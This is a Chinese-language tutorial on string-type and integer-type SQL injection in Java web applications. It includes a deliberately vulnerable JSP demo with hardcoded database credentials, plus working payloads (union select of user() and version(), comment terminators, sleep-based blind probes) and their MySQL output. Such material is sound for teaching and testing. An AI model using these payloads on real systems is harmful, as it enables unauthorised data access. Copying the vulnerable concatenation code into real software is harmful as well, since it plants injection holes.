SQL注入中如果需要我们手动闭合SQL语句的'的注入类型称为字符型注入、反之成为整型注入。
字符型注入
假设程序想通过用户名查询用户个人信息,那么它最终执行的SQL语句可能是这样:
select host,user from mysql.user where user = '用户输入的用户名'
正常情况下用户只需传入自己的用户名,如:root,程序会自动拼成一条完整的SQL语句:
select host,user from mysql.user where user = 'root'
查询结果如下:
mysql> select host,user from mysql.user where user = 'root';+-----------+------+| host | user |+-----------+------+| localhost | root |+-----------+------+1 row in set (0.00 sec)
但假设黑客传入了恶意的字符串:root' and 1=2 union select 1,'2去闭合SQL语句,那么SQL语句的含义将会被改变:
select host,user from mysql.user where user = 'root' and 1=2 union select 1,'2'
查询结果如下:
mysql> select host,user from mysql.user where user = 'root' and 1=2 union select 1,'2';+------+------+| host | user |+------+------+| 1 | 2 |+------+------+1 row in set (0.00 sec)
Java代码片段如下:
// 获取用户传入的用户名String user = request.getParameter("user");// 定义最终执行的SQL语句,这里会将用户从请求中传入的host字符串拼接到最终的SQL// 语句当中,从而导致了SQL注入漏洞。String sql = "select host,user from mysql.user where user = '" + user + "'";// 创建预编译对象PreparedStatement pstt = connection.prepareStatement(sql);// 执行SQL语句并获取返回结果对象ResultSet rs = pstt.executeQuery();
如上示例程序,sql变量拼接了我们传入的用户名字符串并调用executeQuery方法执行了含有恶意攻击的SQL语句。我们只需要在用户传入的user参数中拼凑一个能够闭合SQL语句又不影响SQL语法的恶意字符串即可实现SQL注入攻击!需要我们使用'(单引号)闭合的SQL注入漏洞我们通常叫做字符型SQL注入。
快速检测字符串类型注入方式
在渗透测试中我们判断字符型注入点最快速的方式就是在参数值中加'(单引号),如:http://localhost/1.jsp?id=1',如果页面返回500错误或者出现异常的情况下我们通常可以初步判定该参数可能存在注入。
字符型注入测试
示例程序包含了一个存在字符型注入的Demo,测试时请自行修改数据库账号密码,user参数参数存在注入。
sql-injection.jsp:
<%@ page contentType="text/html;charset=UTF-8" language="java" %><%@ page import="java.sql.*" %><%@ page import="java.io.StringWriter" %><%@ page import="java.io.PrintWriter" %><style>table {border-collapse: collapse;}th, td {border: 1px solid #C1DAD7;font-size: 12px;padding: 6px;color: #4f6b72;}</style><%!// 数据库驱动类名public static final String CLASS_NAME = "com.mysql.jdbc.Driver";// 数据库链接字符串public static final String URL = "jdbc:mysql://localhost:3306/mysql?autoReconnect=true&zeroDateTimeBehavior=round&useUnicode=true&characterEncoding=UTF-8&useOldAliasMetadataBehavior=true&useOldAliasMetadataBehavior=true&useSSL=false";// 数据库用户名public static final String USERNAME = "root";// 数据库密码public static final String PASSWORD = "root";Connection getConnection() throws SQLException, ClassNotFoundException {Class.forName(CLASS_NAME);// 注册JDBC驱动类return DriverManager.getConnection(URL, USERNAME, PASSWORD);}%><%String user = request.getParameter("user");if (user != null) {Connection connection = null;try {// 建立数据库连接connection = getConnection();// 定义最终执行的SQL语句,这里会将用户从请求中传入的host字符串拼接到最终的SQL// 语句当中,从而导致了SQL注入漏洞。// String sql = "select host,user from mysql.user where user = ? ";String sql = "select host,user from mysql.user where user = '" + user + "'";out.println("SQL:" + sql);out.println("<hr/>");// 创建预编译对象PreparedStatement pstt = connection.prepareStatement(sql);// pstt.setObject(1, user);// 执行SQL语句并获取返回结果对象ResultSet rs = pstt.executeQuery();out.println("<table><tr>");out.println("<th>主机</th>");out.println("<th>用户</th>");out.println("<tr/>");// 输出SQL语句执行结果while (rs.next()) {out.println("<tr>");// 获取SQL语句中查询的字段值out.println("<td>" + rs.getObject("host") + "</td>");out.println("<td>" + rs.getObject("user") + "</td>");out.println("<tr/>");}out.println("</table>");// 关闭查询结果rs.close();// 关闭预编译对象pstt.close();} catch (Exception e) {// 输出异常信息到浏览器StringWriter sw = new StringWriter();e.printStackTrace(new PrintWriter(sw));out.println(sw);} finally {// 关闭数据库连接connection.close();}}%>
正常请求,查询用户名为root的用户信息测试:
http://localhost:8080/sql-injection.jsp?user=root

提交含有'(单引号)的注入语句测试:
http://localhost:8080/sql-injection.jsp?user=root‘

如果用户屏蔽了异常信息的显示我们就无法直接通过页面信息确认是否是注入,但是我们可以通过后端响应的状态码来确定是否是注入点,如果返回的状态码为500,那么我们就可以初步的判定user参数存在注入了。
提交读取Mysql用户名和版本号注入语句测试:
http://localhost:8080/sql-injection.jsp?user=root‘ and 1=2 union select user(),version() —%20

这里使用了-- (--空格,空格可以使用%20代替)来注释掉SQL语句后面的'(单引号),当然我们同样也可以使用#(井号,URL传参的时候必须传URL编码后的值:%23)注释掉'。
整型注入
假设我们执行的SQL语句是:
select id, username, email from sys_user where id = 用户ID
查询结果如下:
mysql> select id, username, email from sys_user where id = 1;+----+----------+-------------------+| id | username | email |+----+----------+-------------------+| 1 | yzmm | admin@javaweb.org |+----+----------+-------------------+1 row in set (0.01 sec)
假设程序预期用户输入一个数字类型的参数作为查询条件,且输入内容未经任何过滤直接就拼到了SQL语句当中,那么也就产生了一种名为整型SQL注入的漏洞。
对应的程序代码片段:
// 获取用户传入的用户IDString id = request.getParameter("id");// 定义最终执行的SQL语句,这里会将用户从请求中传入的host字符串拼接到最终的SQL// 语句当中,从而导致了SQL注入漏洞。String sql = "select id, username, email from sys_user where id =" + id;// 创建预编译对象PreparedStatement pstt = connection.prepareStatement(sql);// 执行SQL语句并获取返回结果对象ResultSet rs = pstt.executeQuery();
快速检测整型注入方式
整型注入相比字符型更容易检测,使用参数值添加'(单引号)的方式或者使用运算符、数据库子查询、睡眠函数(一定慎用!如:sleep)等。
检测方式示例:
id=2-1id=(2)id=(select 2 from dual)id=(select 2)
盲注时不要直接使用sleep(n)!例如: id=sleep(3)
对应的SQL语句select username from sys_user where id = sleep(3)
执行结果如下:
mysql> select username from sys_user where id= sleep(3);Empty set (24.29 sec)
为什么只是sleep了3秒钟最终变成了24秒?因为sleep语句执行了select count(1) from sys_user遍!当前sys_user表因为有8条数据所以执行了8次。
如果非要使用sleep的方式可以使用子查询的方式代替:
id=2 union select 1, sleep(3)
查询结果如下:
mysql> select username,email from sys_user where id=1 union select 1, sleep(3);+----------+-------------------+| username | email |+----------+-------------------+| yzmm | admin@javaweb.org || 1 | 0 |+----------+-------------------+2 rows in set (3.06 sec)
